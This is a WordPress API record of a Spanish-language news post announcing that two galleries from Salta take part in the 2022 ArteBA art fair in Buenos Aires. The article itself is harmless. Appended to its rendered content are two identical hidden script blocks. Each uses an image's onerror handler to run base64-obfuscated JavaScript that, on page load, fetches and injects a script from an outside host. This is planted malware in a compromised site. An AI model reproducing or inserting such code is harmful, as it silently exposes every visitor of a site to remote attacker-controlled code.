{"id":1578,"date":"2022-10-08T00:51:03","date_gmt":"2022-10-08T03:51:03","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1578"},"modified":"2025-08-14T00:33:50","modified_gmt":"2025-08-14T03:33:50","slug":"la-ciudad-de-salta-presente-en-la-feria-de-arte-contemporaneo-arteba","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1578","title":{"rendered":"La ciudad de Salta presente en la\u00a0Feria de Arte Contempor\u00e1neo\u00a0ArteBA"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#ba0734\"><strong><em>Se trata de la edici\u00f3n n\u00famero 31 y se desarrollar\u00e1 del 7 al 9 de octubre en el Centro Costa Salguero en Buenos Aires. Participar\u00e1n dos galer\u00edas art\u00edsticas salte\u00f1as que contar\u00e1n con el acompa\u00f1amiento y auspicio de la Municipalidad.<\/em><\/strong><\/h4>\n\n\n\n<p>La ciudad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, estar\u00e1 presente en la edici\u00f3n 31 de la Feria de Arte Contempor\u00e1neo&nbsp;ArteBA, del 7 al 9 de octubre, en Buenos Aires, acompa\u00f1ando la participaci\u00f3n de un grupo de artistas salte\u00f1os.<\/p>\n\n\n\n<p>Durante esta edici\u00f3n y, de manera in\u00e9dita, dos galer\u00edas de arte de nuestra ciudad participar\u00e1n con el auspicio del municipio: La Arte de&nbsp;Soledad Dahbar y Remota Galer\u00eda de Guido Yanitto&nbsp;y Gonzalo El\u00edas.<\/p>\n\n\n\n<p>Estas&nbsp;galer\u00edas participar\u00e1n&nbsp;en la llamada zona Utop\u00eda. La primera, La Arte, tendr\u00e1 la presencia de Karla Buzo y la segunda, Remota Galer\u00eda, estar\u00e1 presente con Mat\u00edas Guerra, Clara Johnston, Florencia Sadir, Guido Yanitto, Princex 13, Claudia Alarc\u00f3n y Pajita Garc\u00eda Bes.<\/p>\n\n\n\n<p>Acompa\u00f1ando a&nbsp;los representantes salte\u00f1os, Rolando Arias, subsecretario de Cultura municipal expres\u00f3 que \u00abes muy importante la presencia de galer\u00edas de arte salte\u00f1as en estos espacios de encuentro nacionales ya que son una gran plataforma para visibilizar a los artistas locales, es por eso que desde la Municipalidad de Salta apoyamos en este caso a las&nbsp;galer\u00edas&nbsp;seleccionadas\u00bb,<\/p>\n\n\n\n<p><strong>Sobre la Feria&nbsp;<\/strong><\/p>\n\n\n\n<p>La edici\u00f3n 31 de la feria ArteBA se desarrollar\u00e1 en el Centro Costa Salguero y contar\u00e1 con la presencia de 400 artistas, 71 galer\u00edas y proyectos, programaci\u00f3n art\u00edstica, ciclo de charlas y programa de museos.<\/p>\n\n\n\n<p>Como ya es tradici\u00f3n, reunir\u00e1 a coleccionistas, galeristas, directores de museos y artistas, curadores, compradores de arte, trabajadores de la cultura y p\u00fablico de todas las edades interesado en acercarse al arte moderno y contempor\u00e1neo.<\/p>\n\n\n\n<p>Este a\u00f1o, la feria se desarrollar\u00e1 en torno a dos grandes ejes. Por un lado, las galer\u00edas y proyectos art\u00edsticos, en distintas categor\u00edas:<\/p>\n\n\n\n<p>Secci\u00f3n Principal: galer\u00edas establecidas y de reconocida trayectoria<\/p>\n\n\n\n<p>Stage: galer\u00edas de menos de 5 a\u00f1os de apertura y que representan artistas de joven trayectoria.<\/p>\n\n\n\n<p>Utop\u00eda: orientada a las m\u00e1s recientes producciones que agrupa galer\u00edas, espacios gestionados por artistas, organizaciones con y sin fines de lucro y otras plataformas experimentales de comercializaci\u00f3n.<\/p>\n\n\n\n<p>Por el otro, la programaci\u00f3n art\u00edstica mostrar\u00e1 la diversidad de formatos para la producci\u00f3n contempor\u00e1nea. Bajo la curadur\u00eda de profesionales, trabajar\u00e1 diferentes tem\u00e1ticas muy actuales como la sustentabilidad, el cuerpo, la experiencia y la tecnolog\u00eda.<\/p>\n\n\n\n<p>El programa de Auditorio estar\u00e1 compuesto por tres ciclos que se repetir\u00e1n cada d\u00eda en las mismas franjas horarias:<\/p>\n\n\n\n<p>Ciclo Isla de Ediciones Fundaci\u00f3n Proa<\/p>\n\n\n\n<p>Ciclo Arte y Cultura Digital. Explorando el abismo<\/p>\n\n\n\n<p>Ciclo de Charlas La Naci\u00f3n<\/p>\n\n\n\n<p>La Feria ArteBA 2022 abre sus puertas al p\u00fablico con el prop\u00f3sito de ser una plataforma de encuentro que re\u00fane a todas aquellas personas que conforman el ecosistema del arte en Argentina. El objetivo para esta edici\u00f3n es continuar acompa\u00f1ando la reactivaci\u00f3n del sector con una feria que sostiene su presencia local y se propone mostrar lo mejor del arte argentino moderno y contempor\u00e1neo.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/prensa.municipalidadsalta.gob.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-2.jpeg\" alt=\"\"\/><\/figure>\n<\/figure>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"755\" data-id=\"1580\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-1-1024x755.jpeg\" alt=\"\" class=\"wp-image-1580\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-1-1024x755.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-1-300x221.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-1-768x566.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-1-696x513.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-1-1068x788.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-1-569x420.jpeg 569w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-1-80x60.jpeg 80w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-1.jpeg 1200w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"1021\" data-id=\"1579\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-2-1024x1021.jpeg\" alt=\"\" class=\"wp-image-1579\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-2-1024x1021.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-2-300x300.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-2-150x150.jpeg 150w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-2-768x766.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-2-696x694.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-2-1068x1065.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-2-421x420.jpeg 421w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/10\/arteba-2022-artistas-2.jpeg 1441w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se trata de la edici\u00f3n n\u00famero 31 y se desarrollar\u00e1 del 7 al 9 de octubre en el Centro Costa Salguero en Buenos Aires. Participar\u00e1n dos galer\u00edas art\u00edsticas salte\u00f1as que contar\u00e1n con el acompa\u00f1amiento y auspicio de la Municipalidad. La ciudad de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura y Turismo, estar\u00e1 presente en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1580,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,9],"tags":[],"class_list":{"0":"post-1578","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1578"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1578"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1578\/revisions"}],"predecessor-version":[{"id":7327,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1578\/revisions\/7327"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1580"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1578"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1578"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1578"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}